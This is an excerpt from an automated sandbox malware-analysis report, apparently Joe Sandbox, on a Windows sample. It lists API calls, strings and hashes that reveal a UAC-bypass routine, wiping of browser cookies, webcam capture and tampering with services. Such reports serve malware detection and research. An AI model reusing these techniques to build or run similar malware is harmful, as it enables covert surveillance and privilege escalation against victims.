                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                • API String ID: 3286818993-122982132
                                • Opcode ID: 9e766dfad90d1072eeebd329423a54b06a7feef5cd64e583281de775404f8260
                                • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                • Opcode Fuzzy Hash: 9e766dfad90d1072eeebd329423a54b06a7feef5cd64e583281de775404f8260
                                • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                • API String ID: 1133728706-4073444585
                                • Opcode ID: 68a42e42b8838ca6718af06bcf6c8b1fb058983d8eb4a6e4fef459ca4e905c38
                                • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                • Opcode Fuzzy Hash: 68a42e42b8838ca6718af06bcf6c8b1fb058983d8eb4a6e4fef459ca4e905c38
                                • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                • _free.LIBCMT ref: 00450F48
                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00450F53
                                • _free.LIBCMT ref: 00450F5E
                                • _free.LIBCMT ref: 00450FB2
                                • _free.LIBCMT ref: 00450FBD
                                • _free.LIBCMT ref: 00450FC8
                                • _free.LIBCMT ref: 00450FD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                • int.LIBCPMT ref: 00411183
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 004111C3
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID: (mG
                                • API String ID: 2536120697-4059303827
                                • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\xi0TpAxHGMsm.exe), ref: 004075D0
                                  • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                • CoUninitialize.OLE32 ref: 00407629
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitializeObjectUninitialize_wcslen
                                • String ID: C:\Users\user\Desktop\xi0TpAxHGMsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                • API String ID: 3851391207-4080365188
                                • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                • GetLastError.KERNEL32 ref: 0040BAE7
                                Strings
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                • [Chrome Cookies not found], xrefs: 0040BB01
                                • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                • UserProfile, xrefs: 0040BAAD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                • Opcode Fuzzy Hash: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 00444066
                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00444078
                                • _free.LIBCMT ref: 0044408B
                                • _free.LIBCMT ref: 0044409C
                                • _free.LIBCMT ref: 004440AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID: x9k
                                • API String ID: 776569668-1900533136
                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __allrem.LIBCMT ref: 0043AC69
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                • __allrem.LIBCMT ref: 0043AC9C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                • __allrem.LIBCMT ref: 0043ACD1
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: H_prologSleep
                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                • API String ID: 3469354165-3054508432
                                • Opcode ID: 98e8889294d7cadc1f704f946c2f8c3de485e45006c88c58c1134ec26a604bb7
                                • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                • Opcode Fuzzy Hash: 98e8889294d7cadc1f704f946c2f8c3de485e45006c88c58c1134ec26a604bb7
                                • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                  • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                  • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                  • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                • String ID:
                                • API String ID: 3950776272-0
                                • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                • String ID:
                                • API String ID: 493672254-0
                                • Opcode ID: 6d957316612e9e1639687d6e998d7ab77ff57d14ab12c87d2f09a2430009e9f1
                                • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                • Opcode Fuzzy Hash: 6d957316612e9e1639687d6e998d7ab77ff57d14ab12c87d2f09a2430009e9f1
                                • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • _free.LIBCMT ref: 0044824C
                                • _free.LIBCMT ref: 00448274
                                • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • _abort.LIBCMT ref: 00448293
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
